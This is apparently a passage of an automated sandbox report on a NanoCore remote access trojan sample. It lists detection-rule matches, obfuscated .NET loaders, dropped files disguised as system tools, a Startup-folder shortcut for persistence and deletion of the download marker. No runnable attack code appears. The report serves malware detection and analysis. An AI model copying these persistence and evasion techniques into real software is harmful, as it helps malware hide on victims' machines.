        Source: Process Memory Space: d4e475d7d17a16be8b9eeac6e10b25af.exe PID: 576, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 3.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 3.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 3.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 3.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 3.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: classification engineClassification label: mal100.troj.evad.winEXE@8/7@8/2
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_0042A2D5 GetLastError,FormatMessageW,2_2_0042A2D5
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_00418713 AdjustTokenPrivileges,CloseHandle,2_2_00418713
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_00418CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_00418CC3
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_0042B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,2_2_0042B59E
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_00423E91 PeekMessageW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,2_2_00423E91
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_0042C602 CoInitialize,CoCreateInstance,CoUninitialize,2_2_0042C602
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003C4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,2_2_003C4FE9
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeFile created: C:\Users\user\hdwwizJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_01
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{ebebb95b-836f-4d8b-92f1-dafac3cec9d8}
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeVirustotal: Detection: 66%
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeMetadefender: Detection: 37%
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeReversingLabs: Detection: 70%
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeFile read: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe 'C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe'
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
        Source: unknownProcess created: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat 'C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat'
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
        Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeJump to behavior
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeJump to behavior
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeStatic file information: File size 1124920 > 1048576
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: RegAsm.pdb source: dhcpmon.exe, dhcpmon.exe.1.dr
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Data Obfuscation:

        barindex
        .NET source code contains potential unpackerShow sources
        Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 3.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 3.2.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_0043C304 LoadLibraryA,GetProcAddress,2_2_0043C304
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drStatic PE information: real checksum: 0xeeb70 should be: 0x11e6ba
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeStatic PE information: real checksum: 0xeeb70 should be: 0x1228ef
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003D43B7 push edi; ret 2_2_003D43B9
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003D43CB push edi; ret 2_2_003D43CD
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003CC590 push eax; retn 003Ch2_2_003CC599
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003E8B85 push ecx; ret 2_2_003E8B98
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 7_2_04CB0007 push cs; retf 7_2_04CB001E
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 7_2_04CB00B9 push ds; iretd 7_2_04CB00BA
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 7_2_04CB001F push ds; iretd 7_2_04CB006A
        Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 3.2.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 3.2.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeFile created: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeFile created: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batJump to dropped file
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSAT.lnkJump to behavior
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSAT.lnkJump to behavior

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe:Zone.Identifier read attributes | deleteJump to behavior
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003C4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_003C4A35
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_004455FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_004455FD
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003E33C7 RtlEncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_003E33C7
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
